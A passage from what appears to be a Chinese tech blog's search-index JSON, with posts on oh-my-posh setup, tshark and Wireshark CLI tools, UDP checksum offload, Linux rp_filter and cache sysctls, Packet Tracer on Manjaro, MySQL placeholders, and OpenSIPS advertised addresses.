安装过vscode编辑器 默认情况下,所有命令均在powershell下执行的 1. 安装 oh my posh 1.2 方式1: 通过代理安装 假如你有socks代理,那么可以用winget安装\n打开你的power shell 执行类似下面的命令,来配置代理\n$env:all_proxy=\u0026#34;socks5://127.0.0.1:1081\u0026#34; 如果没有socks代理,最好不要用winget安装,因为速度太慢。然后执行:\nwinget install JanDeDobbeleer.OhMyPosh -s winget 1.2 方式2: 下载exe,手工安装 再oh-my-posh的release界面 https://github.com/JanDeDobbeleer/oh-my-posh/releases\n可以看到很多版本的文件,windows选择install-amd64.exe, 下载完了之后手工点击执行来安装。\nhttps://github.com/JanDeDobbeleer/oh-my-posh/releases/download/v8.13.1/install-amd64.exe\n2. 配置 oh-my-posh 在powershell中执行下面的命令,vscode回打开对应的文件。\ncode $PROFILE 在文件中粘贴如下的内容:\noh-my-posh init pwsh | Invoke-Expression 保存文件,然后再次打开windows termial, 输入下面的命令来reload profile\n. $PROFILE 然后你可以看到终端出现了提示符,有可能有点卡,第一次是有点慢的。但是很多符号可能是乱码,因为是没有配置相关的字体。\n3. 
字体配置 3.1 安装字体 下载文件 https://github.com/ryanoasis/nerd-fonts/releases/download/v2.1.0/Meslo.zip 解压文件 打开设置,在个性化》字体中,将之前下载好的所有字体,拖动到下面的红框中,字体就会自动安装 3.2 windows termial字体配置 用vscode打开对windows termial的配置json文件,在profiles.default.font中配置如下字体\n\u0026#34;font\u0026#34;: { \u0026#34;face\u0026#34;: \u0026#34;MesloLGM NF\u0026#34; } 配置之后,需要重启windows termial","title":"windows11 安装 oh my posh"},{"content":"自从我换了新款的惠普战X之后,我的老搭档,2017款的macbook pro, 已经在沙发上躺了很久了。\n我拍了拍它的脑袋,对它语重心长的说: 人不能闲着,闲着容易生病,笔记本也是如此。虽然你已经是5年前的mbp了, 但是廉颇老矣,尚能饭否?\nmbp面无表情,胡子邋遢,朝我瞥了一眼,像是嘲讽,又像是不满,一口气吸掉还剩一点的香烟,有气无力的说:我已经工作五年了,按照国家的法律规定,已经到了退休的年龄,是该享受享受了。\n我\n","permalink":"https://wdd.js.org/posts/2022/07/guv65u/","summary":"自从我换了新款的惠普战X之后,我的老搭档,2017款的macbook pro, 已经在沙发上躺了很久了。\n我拍了拍它的脑袋,对它语重心长的说: 人不能闲着,闲着容易生病,笔记本也是如此。虽然你已经是5年前的mbp了, 但是廉颇老矣,尚能饭否?\nmbp面无表情,胡子邋遢,朝我瞥了一眼,像是嘲讽,又像是不满,一口气吸掉还剩一点的香烟,有气无力的说:我已经工作五年了,按照国家的法律规定,已经到了退休的年龄,是该享受享受了。\n我","title":"关于我在闲鱼卖二手这件事"},{"content":"我最早用过有道,我觉得有道很烂。\n后来我开始用印象笔记,我发现印象笔记更烂。不仅界面做的让人觉得侮辱眼睛,即使你开了会员也要看广告。 印象笔记会员被割了韭菜,充到了2026年,但是我最近一两年我基本没有用过印象笔记。\n后来我遇到了文档blog界的new school, notion、语雀、飞书, 就完全抛弃了有道和印象笔记的old school。\n做任何事情,都需要动机。\n写公开博客也是如此。可能有以下原因\n提升个人影响力 提高自己的表达能力 知识积累和分享 公开博客需要三方角力,平台方、内容生产者、内容消费者(读者)。\n作为内容生产者,我们从选择一个平台是需要很多理由的。可能是UI界面的颜值,可能是一见钟情界面交互。\n就像男女的相亲,首先要被外貌吸引,才能有下文。\n然而除了那一见钟情的必然是短暂的,除此之外,我发现了另一个重要原因:迁移成本\n我以前决定不用印象的时候,印象笔记上还有我将近一千多篇的笔记。虽说印象笔记有导出工具,但是只有当你用的时候,你才能体会导出工具是多坑爹。\n假如你一天决定不用这个平台了,你想把所有你产出的内容都迁移出来,你要花费多少成本呢? 很多人都没有考虑过这件事情。\n就像温水煮青蛙,只有感觉到烫的时候,青蛙才会准备跳走,但是青蛙还能跳出去吗? 
可能他的腿都已经煮熟了吧?\n从另外一个方面来说,作为内容生产者,我们要花时间,花精力来写文章,还要花金钱来买平台的会员,然而平台对内容生产者来说,有什么回报呢?\n我们只不过是为他人做嫁衣罢了。就像旧时代的长工,只不过在一个大一点的地主家干活了吧。\n再见了,语雀。\n新的bolg地址: wdd.js.org\n我以前没得选,我现在想选择做个自由人\n","permalink":"https://wdd.js.org/posts/2022/06/fk9rgk/","summary":"我最早用过有道,我觉得有道很烂。\n后来我开始用印象笔记,我发现印象笔记更烂。不仅界面做的让人觉得侮辱眼睛,即使你开了会员也要看广告。 印象笔记会员被割了韭菜,充到了2026年,但是我最近一两年我基本没有用过印象笔记。\n后来我遇到了文档blog界的new school, notion、语雀、飞书, 就完全抛弃了有道和印象笔记的old school。\n做任何事情,都需要动机。\n写公开博客也是如此。可能有以下原因\n提升个人影响力 提高自己的表达能力 知识积累和分享 公开博客需要三方角力,平台方、内容生产者、内容消费者(读者)。\n作为内容生产者,我们从选择一个平台是需要很多理由的。可能是UI界面的颜值,可能是一见钟情界面交互。\n就像男女的相亲,首先要被外貌吸引,才能有下文。\n然而除了那一见钟情的必然是短暂的,除此之外,我发现了另一个重要原因:迁移成本\n我以前决定不用印象的时候,印象笔记上还有我将近一千多篇的笔记。虽说印象笔记有导出工具,但是只有当你用的时候,你才能体会导出工具是多坑爹。\n假如你一天决定不用这个平台了,你想把所有你产出的内容都迁移出来,你要花费多少成本呢? 很多人都没有考虑过这件事情。\n就像温水煮青蛙,只有感觉到烫的时候,青蛙才会准备跳走,但是青蛙还能跳出去吗? 可能他的腿都已经煮熟了吧?\n从另外一个方面来说,作为内容生产者,我们要花时间,花精力来写文章,还要花金钱来买平台的会员,然而平台对内容生产者来说,有什么回报呢?\n我们只不过是为他人做嫁衣罢了。就像旧时代的长工,只不过在一个大一点的地主家干活了吧。\n再见了,语雀。\n新的bolg地址: wdd.js.org\n我以前没得选,我现在想选择做个自由人","title":"最后一篇blog, 是时候说再见了"},{"content":"1. 使用摘要 一个命令的使用摘要非常重要,摘要里包含了这个工具最常用的用法。\n要注意的是,如果要用过滤器,一定要放到最后。\ntshark [ -i \u0026lt;capture interface\u0026gt;|- ] [ -f \u0026lt;capture filter\u0026gt; ] [ -2 ] [ -r \u0026lt;infile\u0026gt; ] [ -w \u0026lt;outfile\u0026gt;|- ] [ options ] [ \u0026lt;filter\u0026gt; ] tshark -G [ \u0026lt;report type\u0026gt; ] [ --elastic-mapping-filter \u0026lt;protocols\u0026gt; ] 2. 为什么要学习tshark? 一般情况下,我们可能会在服务端用tcpdump抓包,然后把包拿下来,用wireshark分析。那么我们为什么要学习tshark呢?\n相比于wireshark, tshark有以下的优点\n速度飞快:wireshark在加载包的时候,tshark可能已经给出了结果。 更稳定:wireshark在处理包的时候,常常容易崩溃 更适合做文本处理:tshark的输出是文本,这个文本很容易被awk, sort, uniq等等命令处理 但是我不建议上来就学习,更建议在熟悉wireshark之后,再去进一步学习tshark\n3. 
使用场景 3.1 基本场景 用wireshark最基本的场景的把pcap文件拖动到wireshark中,然后可能加入一些过滤条件。\ntshark -r demo.pcap tshark -r demo.pcap -c 1 # 只读一个包就停止 输出的列分别为:序号,相对时间,绝对时间,源ip, 源端口,目标ip, 目标端口\n3.2 按照表格输出 tshark -r demo.pcap -T tabs 3.3 按照指定的列输出 例如,抓的的sip的包,我们只想输出sip的user-agent字段。\ntshark -r demo.pcap -Tfields -e sip.User-Agent sip and sip.Method==REGISTER 按照上面的输出,我们可以用简单的sort和seq就可以把所有的设备类型打印出来。\n3.4 过滤之后写入文件 比如一个很大的pcap文件,我们可以用tshark过滤之后,写入一个新的文件。\n例如下面的,我们使用过滤器sip and sip.Method==REGISTER, 然后把过滤后的包写入到register.pcap\n● -Y \u0026ldquo;sip and frame.cap_len \u0026gt; 1300\u0026rdquo; 查看比较大的SIP包 tshark -r demo.pcap -w register.pcap sip and sip.Method==REGISTER\n3.4 统计分析 tshark支持统计分析,例如统计rtp 丢包率。\ntshark -r demo.pcap -qn -z rtp,streams -z参数是用来各种统计分析的,具体支持的统计类型,可以用\ntshark -z help ➜ Desktop tshark -z help afp,srt ancp,tree ansi_a,bsmap ansi_a,dtap ansi_map asap,stat bacapp_instanceid,tree bacapp_ip,tree bacapp_objectid,tree bacapp_service,tree calcappprotocol,stat camel,counter camel,srt collectd,tree componentstatusprotocol,stat conv,bluetooth conv,dccp conv,eth conv,fc 参考 https://www.wireshark.org/docs/man-pages/tshark.html ","permalink":"https://wdd.js.org/network/tshark/","summary":"1. 使用摘要 一个命令的使用摘要非常重要,摘要里包含了这个工具最常用的用法。\n要注意的是,如果要用过滤器,一定要放到最后。\ntshark [ -i \u0026lt;capture interface\u0026gt;|- ] [ -f \u0026lt;capture filter\u0026gt; ] [ -2 ] [ -r \u0026lt;infile\u0026gt; ] [ -w \u0026lt;outfile\u0026gt;|- ] [ options ] [ \u0026lt;filter\u0026gt; ] tshark -G [ \u0026lt;report type\u0026gt; ] [ --elastic-mapping-filter \u0026lt;protocols\u0026gt; ] 2. 为什么要学习tshark? 一般情况下,我们可能会在服务端用tcpdump抓包,然后把包拿下来,用wireshark分析。那么我们为什么要学习tshark呢?\n相比于wireshark, tshark有以下的优点\n速度飞快:wireshark在加载包的时候,tshark可能已经给出了结果。 更稳定:wireshark在处理包的时候,常常容易崩溃 更适合做文本处理:tshark的输出是文本,这个文本很容易被awk, sort, uniq等等命令处理 但是我不建议上来就学习,更建议在熟悉wireshark之后,再去进一步学习tshark\n3. 
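正文提到 tshark 的输出是文本,很容易被 awk、sort、uniq 等命令处理。如果想在 Python 里接着处理(例如统计 `-Tfields -e sip.User-Agent` 输出里各设备出现的次数),可以这样示意(示例中的 User-Agent 取值是虚构的):

```python
# 示意:统计 tshark 字段输出,每行一个 User-Agent,等价于 sort | uniq -c | sort -nr
from collections import Counter

def count_user_agents(lines):
    return Counter(line.strip() for line in lines if line.strip())

out = ["Yealink SIP-T23G", "Grandstream GXP1625", "Yealink SIP-T23G"]
print(count_user_agents(out).most_common())
```

实际使用时,把 tshark 的标准输出按行读进来传给这个函数即可。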
使用场景 3.1 基本场景 用wireshark最基本的场景的把pcap文件拖动到wireshark中,然后可能加入一些过滤条件。\ntshark -r demo.pcap tshark -r demo.pcap -c 1 # 只读一个包就停止 输出的列分别为:序号,相对时间,绝对时间,源ip, 源端口,目标ip, 目标端口","title":"Tshark入门到精通"},{"content":"在服务端抓包,然后在wireshark上分析,发现wireshark提示:udp checksum字段有问题\nchecksum 0x\u0026hellip; incrorect should be 0x.. (maybe caused by udp checksum offload)\n以前我从未遇到过udp checksum的问题。所以这次是第一次遇到,所以需要学习一下。 首先udp checksum是什么?\n我们看下udp的协议组成的字段,其中就有16位的校验和\n校验和一般都是为了检验数据包在传输过程中是否出现变动的。\n如果接受端收到的udp消息校验和错误,将会被悄悄的丢弃 udp校验和是一个端到端的校验和。端到端意味它不会在中间网络设备上校验。 校验和由发送方负责计算,接收端负责验证。目的是为了发现udp首部和和数据在发送端和接受端之间是否发生了变动 udp校验和是可选的功能,但是总是应该被默认启用。 如果发送方设置了udp校验和,则接受方必须验证 发送方负责计算?具体是谁负责计算\n计算一般都是CPU的工作,但是有些网卡也是支持checksum offload的。\n所谓offload, 是指本来可以由cpu计算的,改变由网卡硬件负责计算。 这样做有很多好处,\n可以降低cpu的负载,提高系统的性能 网卡的硬件checksum, 效率更高 为什么只有发送方出现udp checksum 错误? 我在接受方和放松方都进行了抓包,一个比较特殊的特征是,只有发送方发现了udp checksum的错误,在接受方,同样的包,udp checksum的值却是正确的。\n一句话的解释:tcpdump在接收方抓到的包,本身checksum字段还没有被计算,在后续的步骤,这个包才会被交给NIC, NIC来负责计算。\n结论 maybe caused by udp checksum offload 这个报错并没有什么问题。\n参考 ● 《tcp/ip 详解》 ● https://www.kernel.org/doc/html/latest/networking/checksum-offloads.html ● https://dominikrys.com/posts/disable-udp-checksum-validation/ ● https://sokratisg.net/2012/04/01/udp-tcp-checksum-errors-from-tcpdump-nic-hardware-offloading/\n","permalink":"https://wdd.js.org/network/udp-checksum-offload/","summary":"在服务端抓包,然后在wireshark上分析,发现wireshark提示:udp checksum字段有问题\nchecksum 0x\u0026hellip; incrorect should be 0x.. (maybe caused by udp checksum offload)\n以前我从未遇到过udp checksum的问题。所以这次是第一次遇到,所以需要学习一下。 首先udp checksum是什么?\n我们看下udp的协议组成的字段,其中就有16位的校验和\n校验和一般都是为了检验数据包在传输过程中是否出现变动的。\n如果接受端收到的udp消息校验和错误,将会被悄悄的丢弃 udp校验和是一个端到端的校验和。端到端意味它不会在中间网络设备上校验。 校验和由发送方负责计算,接收端负责验证。目的是为了发现udp首部和和数据在发送端和接受端之间是否发生了变动 udp校验和是可选的功能,但是总是应该被默认启用。 如果发送方设置了udp校验和,则接受方必须验证 发送方负责计算?具体是谁负责计算\n计算一般都是CPU的工作,但是有些网卡也是支持checksum offload的。\n所谓offload, 是指本来可以由cpu计算的,改变由网卡硬件负责计算。 这样做有很多好处,\n可以降低cpu的负载,提高系统的性能 网卡的硬件checksum, 效率更高 为什么只有发送方出现udp checksum 错误? 
我在接收方和发送方都进行了抓包,一个比较特殊的特征是,只有发送方发现了udp checksum的错误,在接收方,同样的包,udp checksum的值却是正确的。\n一句话的解释:tcpdump在发送方抓到的包,本身checksum字段还没有被计算,在后续的步骤,这个包才会被交给NIC, NIC来负责计算。\n结论 maybe caused by udp checksum offload 这个报错并没有什么问题。\n参考 ● 《tcp/ip 详解》 ● https://www.kernel.org/doc/html/latest/networking/checksum-offloads.html ● https://dominikrys.com/posts/disable-udp-checksum-validation/ ● https://sokratisg.net/2012/04/01/udp-tcp-checksum-errors-from-tcpdump-nic-hardware-offloading/","title":"Udp Checksum Offload"},{"content":"大多数时候我们都是以图形界面的方式使用wireshark, 其实一般只要你安装了wireshark,同时也附带安装了一些命令行工具。 这些工具也可以极大的提高生产效率。 本文只是对工具的功能简介,可以使用命令 -h, 查看命令的具体使用文档。\n1. editcap 编辑抓包文件 Editcap (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Edit and/or translate the format of capture files. 举例: 按照时间范围从input.pcap文件中拿出指定时间范围的包\neditcap -A \u0026#39;2014-12-10 10:11:01\u0026#39; -B \u0026#39;2014-12-10 10:21:01\u0026#39; input.pcap output.pcap 2. androiddump 这个命令似乎可以用来对安卓系统进行抓包,没玩过安卓,不再多说。\nWireshark - androiddump v1.1.0 Usage: androiddump --extcap-interfaces [--adb-server-ip=\u0026lt;arg\u0026gt;] [--adb-server-tcp-port=\u0026lt;arg\u0026gt;] androiddump --extcap-interface=INTERFACE --extcap-dlts androiddump --extcap-interface=INTERFACE --extcap-config androiddump --extcap-interface=INTERFACE --fifo=PATH_FILENAME --capture 3. ciscodump 似乎是对思科的网络进行抓包的,没用过 Wireshark - ciscodump v1.0.0 Usage: ciscodump \u0026ndash;extcap-interfaces ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;extcap-dlts ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;extcap-config ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;remote-host myhost \u0026ndash;remote-port 22222 \u0026ndash;remote-username myuser \u0026ndash;remote-interface gigabit0/0 \u0026ndash;fifo=FILENAME \u0026ndash;capture\n4. 
randpktdump 这个似乎也是一个网络抓包的 Wireshark - randpktdump v0.1.0 Usage: randpktdump \u0026ndash;extcap-interfaces randpktdump \u0026ndash;extcap-interface=randpkt \u0026ndash;extcap-dlts randpktdump \u0026ndash;extcap-interface=randpkt \u0026ndash;extcap-config randpktdump \u0026ndash;extcap-interface=randpkt \u0026ndash;type dns \u0026ndash;count 10 \u0026ndash;fifo=FILENAME \u0026ndash;capture\n5. sshdump 这个应该是对ssh进行抓包的 Wireshark - sshdump v1.0.0 Usage: sshdump \u0026ndash;extcap-interfaces sshdump \u0026ndash;extcap-interface=sshdump \u0026ndash;extcap-dlts sshdump \u0026ndash;extcap-interface=sshdump \u0026ndash;extcap-config sshdump \u0026ndash;extcap-interface=sshdump \u0026ndash;remote-host myhost \u0026ndash;remote-port 22222 \u0026ndash;remote-username myuser \u0026ndash;remote-interface eth2 \u0026ndash;remote-capture-command \u0026rsquo;tcpdump -U -i eth0 -w -\u0026rsquo; \u0026ndash;fifo=FILENAME \u0026ndash;capture\n6. idl2wrs 7. mergecap 合并多个抓包文件 mergecap -w output.pcap input1.pcap input2.pcap input3.pcap\n8. mmdbresolve 9. randpkt 10. rawshark 11. reordercap Reordercap (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Reorder timestamps of input file frames into output file. See https://www.wireshark.org for more information. Usage: reordercap [options] Options: -n don\u0026rsquo;t write to output file if the input file is ordered. -h display this help and exit. -v print version information and exit.\n12. sharkd Usage: sharkd [\u0026lt;classic_options\u0026gt;|\u0026lt;gold_options\u0026gt;] Classic (classic_options): [-|] examples:\nunix:/tmp/sharkd.sock - listen on unix file /tmp/sharkd.sock Gold (gold_options): -a , \u0026ndash;api listen on this socket -h, \u0026ndash;help show this help information -v, \u0026ndash;version show version information -C , \u0026ndash;config-profile start with specified configuration profile Examples: sharkd -C myprofile sharkd -a tcp:127.0.0.1:4446 -C myprofile See the sharkd page of the Wireshark wiki for full details. 13. 
text2pcap Text2pcap (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Generate a capture file from an ASCII hexdump of packets. See https://www.wireshark.org for more information. Usage: text2pcap [options] where specifies input filename (use - for standard input) specifies output filename (use - for standard output)\n14. tshark 命令行版本的wireshark, 用的最多的 TShark (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Dump and analyze network traffic. See https://www.wireshark.org for more information.\n15. udpdump Wireshark - udpdump v0.1.0 Usage: udpdump \u0026ndash;extcap-interfaces udpdump \u0026ndash;extcap-interface=udpdump \u0026ndash;extcap-dlts udpdump \u0026ndash;extcap-interface=udpdump \u0026ndash;extcap-config udpdump \u0026ndash;extcap-interface=udpdump \u0026ndash;port 5555 \u0026ndash;fifo myfifo \u0026ndash;capture Options: \u0026ndash;extcap-interfaces: list the extcap Interfaces \u0026ndash;extcap-dlts: list the DLTs \u0026ndash;extcap-interface : specify the extcap interface \u0026ndash;extcap-config: list the additional configuration for an interface \u0026ndash;capture: run the capture \u0026ndash;extcap-capture-filter : the capture filter \u0026ndash;fifo : dump data to file or fifo \u0026ndash;extcap-version: print tool version \u0026ndash;debug: print additional messages \u0026ndash;debug-file: print debug messages to file \u0026ndash;help: print this help \u0026ndash;version: print the version \u0026ndash;port : the port to listens on. Default: 5555\n16. capinfos 打印出包的各种信息 Capinfos (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Print various information (infos) about capture files. See https://www.wireshark.org for more information. Usage: capinfos [options] \u0026hellip; General infos: -t display the capture file type -E display the capture file encapsulation -I display the capture file interface information -F display additional capture file information -H display the SHA256, RIPEMD160, and SHA1 hashes of the file -k display the capture comment\n17. 
captype Captype (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Print the file types of capture files.\n18. dftest ➜ ~ dftest \u0026ndash;help\nFilter: \u0026ndash;help\n19. dumpcap See https://www.wireshark.org for more information.\n","permalink":"https://wdd.js.org/network/wireshark-extra-cli/","summary":"大多数时候我们都是以图形界面的方式使用wireshark, 其实一般只要你安装了wireshark,同时也附带安装了一些命令行工具。 这些工具也可以极大的提高生产效率。 本文只是对工具的功能简介,可以使用命令 -h, 查看命令的具体使用文档。\n1. editcap 编辑抓包文件 Editcap (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Edit and/or translate the format of capture files. 举例: 按照时间范围从input.pcap文件中拿出指定时间范围的包\neditcap -A \u0026#39;2014-12-10 10:11:01\u0026#39; -B \u0026#39;2014-12-10 10:21:01\u0026#39; input.pcap output.pcap 2. androiddump 这个命令似乎可以用来对安卓系统进行抓包,没玩过安卓,不再多说。\nWireshark - androiddump v1.1.0 Usage: androiddump --extcap-interfaces [--adb-server-ip=\u0026lt;arg\u0026gt;] [--adb-server-tcp-port=\u0026lt;arg\u0026gt;] androiddump --extcap-interface=INTERFACE --extcap-dlts androiddump --extcap-interface=INTERFACE --extcap-config androiddump --extcap-interface=INTERFACE --fifo=PATH_FILENAME --capture 3. 
ciscodump 似乎是对思科的网络进行抓包的,没用过 Wireshark - ciscodump v1.0.0 Usage: ciscodump \u0026ndash;extcap-interfaces ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;extcap-dlts ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;extcap-config ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;remote-host myhost \u0026ndash;remote-port 22222 \u0026ndash;remote-username myuser \u0026ndash;remote-interface gigabit0/0 \u0026ndash;fifo=FILENAME \u0026ndash;capture","title":"Wireshark 附带的19命令行程序"},{"content":"环境 kernel Linux 5.15.48-1-MANJARO #1 SMP PREEMPT Thu Jun 16 12:33:56 UTC 2022 x86_64 GNU/Linux docker 20.10.16 初始内存 total used free shared buff/cache available 内存: 30Gi 1.9Gi 19Gi 2.0Mi 9.6Gi 28Gi 交换: 0B 0B 0B 初始配置 sysctl -n vm.min_free_kbytes 67584 sysctl -n vm.vfs_cache_pressure 200 vfs_cache_pressure对内存的影响 vfs_cache_pressure设置为200, 理论上系统更倾向于回收内存\n","permalink":"https://wdd.js.org/posts/2022/06/eafeid/","summary":"环境 kernel Linux 5.15.48-1-MANJARO #1 SMP PREEMPT Thu Jun 16 12:33:56 UTC 2022 x86_64 GNU/Linux docker 20.10.16 初始内存 total used free shared buff/cache available 内存: 30Gi 1.9Gi 19Gi 2.0Mi 9.6Gi 28Gi 交换: 0B 0B 0B 初始配置 sysctl -n vm.min_free_kbytes 67584 sysctl -n vm.vfs_cache_pressure 200 vfs_cache_pressure对内存的影响 vfs_cache_pressure设置为200, 理论上系统更倾向于回收内存","title":"vfs_cache_pressure和min_free_kbytes对cache的影响"},{"content":"# 将会下载packettracer到当前目录下 yay -G packettracer cd packettracer # Download PacketTracer_731_amd64.deb to this folder makepkg sudo pacman -U packettracer-7.3.1-2-x86_64.pkg.tar.xz 注意,如果下载的packettracer包不是PacketTracer_731_amd64.deb, 则需要修改PKGBUILD文件中source对应的文件名。 例如我下载的packettracer是Cisco_Packet_Tracer_811_Ubuntu_64bit_cf200f5851.deb\nsource=(\u0026#39;local://Cisco_Packet_Tracer_811_Ubuntu_64bit_cf200f5851.deb\u0026#39; \u0026#39;packettracer.sh\u0026#39;) 注意:最新版的packettracer打开后,必须登录账号才能使用,有点坑。 花费点时间注册了账号后,才能用。\n参考 https://forum.manjaro.org/t/how-to-get-cisco-packet-tracer-on-manjaro/25506/5 
","permalink":"https://wdd.js.org/posts/2022/06/manjaro-packettracer/","summary":"# 将会下载packettracer到当前目录下 yay -G packettracer cd packettracer # Download PacketTracer_731_amd64.deb to this folder makepkg sudo pacman -U packettracer-7.3.1-2-x86_64.pkg.tar.xz 注意,如果下载的packettracer包不是PacketTracer_731_amd64.deb, 则需要修改PKGBUILD文件中source对应的文件名。 例如我下载的packettracer是Cisco_Packet_Tracer_811_Ubuntu_64bit_cf200f5851.deb\nsource=(\u0026#39;local://Cisco_Packet_Tracer_811_Ubuntu_64bit_cf200f5851.deb\u0026#39; \u0026#39;packettracer.sh\u0026#39;) 注意:最新版的packettracer打开后,必须登录账号才能使用,有点坑。 花费点时间注册了账号后,才能用。\n参考 https://forum.manjaro.org/t/how-to-get-cisco-packet-tracer-on-manjaro/25506/5 ","title":"manjaro 安装 packettracer"},{"content":"问题现象 主机上有两个网卡ens192和ens224。ens192网卡是对内网络的网卡,ens224是对外网络的网卡。\nSIP信令阶段都是正常的,但是发现,对于来自node3的RTP流, 并没有从ens192网卡转发给node1上。\nsequenceDiagram title network autonumber node1-\u003e\u003eens192: INVITE ens224-\u003e\u003enode2: INVITE node2-\u003e\u003eens224: 200 ok ens192-\u003e\u003enode1: 200 ok node1-\u003e\u003eens192: ACK ens224-\u003e\u003enode2: ACK node1--\u003e\u003eens192: RTP out ens224--\u003e\u003enode3: RTP out node3--\u003e\u003eens224: RTP in 抓包程序抓到了node3发送到ens224上的包,但是排查应用服务器的日志发现,似乎应用服务器根本没有收到node3上过来的包, 所以也就无法转发。\n因而怀疑是不是在内核上被拦截了。 后来通过将rp_filter设置为0, 然后语音流的转发就正常了。\n事后复盘 node3的这个IP直接往应用服务器上发包,可能会被拦截。因为在信令建立的阶段,应用服务器并没有主动发\n在kernel文档上 rp_filter - INTEGER 0 - No source validation. 1 - Strict mode as defined in RFC3704 Strict Reverse Path Each incoming packet is tested against the FIB and if the interface is not the best reverse path the packet check will fail. By default failed packets are discarded. 2 - Loose mode as defined in RFC3704 Loose Reverse Path Each incoming packet\u0026#39;s source address is also tested against the FIB and if the source address is not reachable via any interface the packet check will fail. Current recommended practice in RFC3704 is to enable strict mode to prevent IP spoofing from DDos attacks. 
If using asymmetric routing or other complicated routing, then loose mode is recommended. The max value from conf/{all,interface}/rp_filter is used when doing source validation on the {interface}. Default value is 0. Note that some distributions enable it in startup scripts. 参考 https://www.jianshu.com/p/717e6cd9d2bb https://www.jianshu.com/p/16d5c130670b https://www.kernel.org/doc/Documentation/networking/ip-sysctl.txt ","permalink":"https://wdd.js.org/network/rp_filter/","summary":"问题现象 主机上有两个网卡ens192和ens224。ens192网卡是对内网络的网卡,ens224是对外网络的网卡。\nSIP信令阶段都是正常的,但是发现,对于来自node3的RTP流, 并没有从ens192网卡转发给node1上。\nsequenceDiagram title network autonumber node1-\u003e\u003eens192: INVITE ens224-\u003e\u003enode2: INVITE node2-\u003e\u003eens224: 200 ok ens192-\u003e\u003enode1: 200 ok node1-\u003e\u003eens192: ACK ens224-\u003e\u003enode2: ACK node1--\u003e\u003eens192: RTP out ens224--\u003e\u003enode3: RTP out node3--\u003e\u003eens224: RTP in 抓包程序抓到了node3发送到ens224上的包,但是排查应用服务器的日志发现,似乎应用服务器根本没有收到node3上过来的包, 所以也就无法转发。\n因而怀疑是不是在内核上被拦截了。 后来通过将rp_filter设置为0, 然后语音流的转发就正常了。\n事后复盘 node3的这个IP直接往应用服务器上发包,可能会被拦截。因为在信令建立的阶段,应用服务器并没有主动发\n在kernel文档上 rp_filter - INTEGER 0 - No source validation. 1 - Strict mode as defined in RFC3704 Strict Reverse Path Each incoming packet is tested against the FIB and if the interface is not the best reverse path the packet check will fail.","title":"Linux内核参数rp_filter"},{"content":" Error EXTRA *mysql.MySQLError=Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0026lsquo;? ( 然而我仔细看了看sql语句,没有看出来究竟哪里有sql报错。\n然而当我把作为placeholder的问号去掉,直接用表的名字,sql是可以直接执行的。我意识到这个可能是和placeholder有关。\n搜索了一下,看到一个链接 https://github.com/go-sql-driver/mysql/issues/848\nPlaceholder can\u0026rsquo;t be used for table name or column name. It\u0026rsquo;s MySQL spec. 
Not bug of this project.\n大意是说,placeholder是不能作为表名或者列名的。\n在mysql关于prepared文档介绍中,在允许使用prepared的语句里,没有看到create table可以用placeholder https://dev.mysql.com/doc/refman/8.0/en/sql-prepared-statements.html\nprepared语句的优点有以下几个\n优化查询速度 防止sql注入 但是也有一些限制\n不是所有语句都能用prepared语句。常见的用法应该是作为select where之后的条件,或者INSERT语句之后的值 不支持一个sql中多条查询语句的形式 ","permalink":"https://wdd.js.org/posts/2022/06/vvdqw6/","summary":" Error EXTRA *mysql.MySQLError=Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0026lsquo;? ( 然而我仔细看了看sql语句,没有看出来究竟哪里有sql报错。\n然而当我把作为placeholder的问号去掉,直接用表的名字,sql是可以直接执行的。我意识到这个可能是和placeholder有关。\n搜索了一下,看到一个链接 https://github.com/go-sql-driver/mysql/issues/848\nPlaceholder can\u0026rsquo;t be used for table name or column name. It\u0026rsquo;s MySQL spec. Not bug of this project.\n大意是说,placeholder是不能作为表名或者列名的。\n在mysql关于prepared文档介绍中,在允许使用prepared的语句里,没有看到create table可以用placeholder https://dev.mysql.com/doc/refman/8.0/en/sql-prepared-statements.html\nprepared语句的优点有以下几个\n优化查询速度 防止sql注入 但是也有一些限制\n不是所有语句都能用prepared语句。常见的用法应该是作为select where之后的条件,或者INSERT语句之后的值 不支持一个sql中多条查询语句的形式 ","title":"mysql placeholder的错误使用方式"},{"content":" OPS \u0026lt;\u0026lt;\u0026lt;----------------------------- ingress 内网 | 公网 | | 192.168.2.11 | 1.2.3.4 INNER_IP | OUTER_IP | | ------------------------------\u0026gt;\u0026gt;\u0026gt; egress 常见公有云提供的云服务器,一般都有一个内网地址如192.168.2.11和一个公网地址如1.2.3.4。 内网地址是配置在网卡上的;公网地址则只是一个映射,并未在网卡上配置。\n我们称从公网到内网的方向为ingress,从内网到公网的方向为egress。\n对于内网来说OpenSIPS的广播地址应该是INNER_IP, 所以对ingress方向的SIP请求,Via应该是INNER_IP。对于公网来说OpenSIPS的广播地址应该是OUTER_IP, 所以对于egress方向的SIP请求,Via应该是OUTER_IP。\n我们模拟一下,假如设置了错误的Via的地址会怎样呢?\n例如从公网到内网的一个INVITE, 如果Via头加上的是OUTER_IP, 那么这个请求的响应也会被送到OPS的公网地址。但是由于网络策略和防火墙等原因,这个来自内网的响应很可能无法被送到OPS的公网地址。\n一般情况下,我们可以使用listen的as参数来设置对外的广告地址。\nlisten = udp:192.168.2.11:5060 as 1.2.3.4:5060 
